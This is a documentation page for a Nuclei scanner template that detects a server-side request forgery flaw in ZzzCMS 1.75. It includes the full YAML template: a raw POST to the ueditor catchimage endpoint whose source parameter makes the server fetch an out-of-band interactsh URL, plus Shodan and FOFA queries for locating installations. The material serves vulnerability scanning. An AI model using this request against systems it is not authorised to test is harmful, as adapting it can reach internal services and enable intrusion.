ZzzCMS 1.75 - Server-Side Request Forgery
ID: zzzcms-ssrf
Severity: high
Author: ritikchaddha
Tags: zzzcms,ssrf,oast
Description
Section titled “Description”ZzzCMS (A Lightweight ASP.NET content management system) is vulnerable to SSRF(Server-Side Request Forgery).
YAML Source
Section titled “YAML Source”id: zzzcms-ssrf
info: name: ZzzCMS 1.75 - Server-Side Request Forgery author: ritikchaddha severity: high description: ZzzCMS (A Lightweight ASP.NET content management system) is vulnerable to SSRF(Server-Side Request Forgery). reference: - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html classification: cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" product: zzzcms vendor: zzzcms tags: zzzcms,ssrf,oast
variables: filename: "{{to_lower(rand_text_alpha(4))}}"
http: - raw: - | POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
source[0]=http://{{interactsh-url}}/{{filename}}.txt
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: body words: - '{"state":' - 'list":' condition: and
- type: status status: - 200# digest: 490a0046304402207f1c0c6449eb5ebe73bf3e022c986bed8def1ed7b35884ff2e242862d72f27830220203400765053d2496f7723844777d5f107f15357c57b143a19618b9890bd88b3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml"